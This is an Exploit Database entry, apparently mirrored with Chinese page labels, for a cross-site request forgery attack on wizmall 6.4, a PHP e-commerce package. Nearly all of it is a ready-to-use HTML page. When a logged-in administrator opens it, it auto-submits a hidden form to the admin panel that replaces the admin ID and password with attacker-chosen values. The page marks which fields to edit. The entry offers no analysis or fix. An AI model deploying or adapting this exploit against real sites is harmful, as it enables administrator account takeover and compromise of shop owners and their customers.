wizmall 6.4 – Cross-Site Request Forgery

• Exploit Database
• 7 阅读

• 作者： pyw1414
  日期： 2010-08-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14595/

• # Exploit Title: wizmall 6.4 CSRF Vulnerabilities 
  # Date: 08/10/2010
  # Author: pyw1414 <i2SEC>
  # Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0
  # Version: 6.4 UTF-8 For php
  # Tested on: XP SP3
  
  
  
  -=[ CSRF Exploit - Change Admin ID/PW]=-
  
  <html>
  <head>
  <title>Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change Admin Id/Password</title>
  </head>
  
  <body onload="document.csrf.submit();">
  <form name="csrf" action="http://[domain]/malladmin/main.php" method="POST">
  <!--- Edit these --->
  <input type="hidden" name="ID" value="i2sec" />
  <input type="hidden" name="PASS" value="test1234" />
  <input type="hidden" name="PASS1" value="test1234" /> 
  
  <!--- Do not edit below ---> 
  <input type="hidden" name="menushow" value="menu1" />
  <input type="hidden" name="theme" value="basicconfig/basic_info2" />
  <input type="hidden" name="action" value="admin_save" />
  <input type="hidden" name="ADMIN_NAME" value="pyw1414" />
  <input type="hidden" name="ADMIN_TITLE" value="i2Sec+Plaza" />
  <input type="hidden" name="ADMIN_TITLE_E" value="" />
  <input type="hidden" name="COMPANY_DOMAIN" value="" />
  <input type="hidden" name="str_watermark" value="" />
  <input type="hidden" name="img_watermark" value="" />
  <input type="hidden" name="HOME_URL" value="" />
  <input type="hidden" name="ADMIN_EMAIL" value="ii@i2sec.co.kr" />
  <input type="hidden" name="ADMIN_TEL" value="" />
  <input type="hidden" name="COMPANY_NAME" value="i2Sec" />
  <input type="hidden" name="PRESIDENT" value="" />
  <input type="hidden" name="COMPANY_NUM" value="" />
  <input type="hidden" name="COMPLICENCE_NUM" value="" />
  <input type="hidden" name="CUSTOMER_TEL" value="" />
  <input type="hidden" name="CUSTOMER_FAX" value="" />
  <input type="hidden" name="COMPANY_ADD" value="" />
  <input type="hidden" name="COMPLICENCE_NUM" value="" />
  <input type="hidden" name="MART_BASEDIR" value="" />
  <input type="hidden" name="SYSTEM_BASEDIR" value="" />
  <input type="hidden" name="smsModule" value="ANYSMS" />
  <input type="hidden" name="sms_id" value="" />
  <input type="hidden" name="sms_pwd" value="" />
  
  </form>
  </body>
  </html>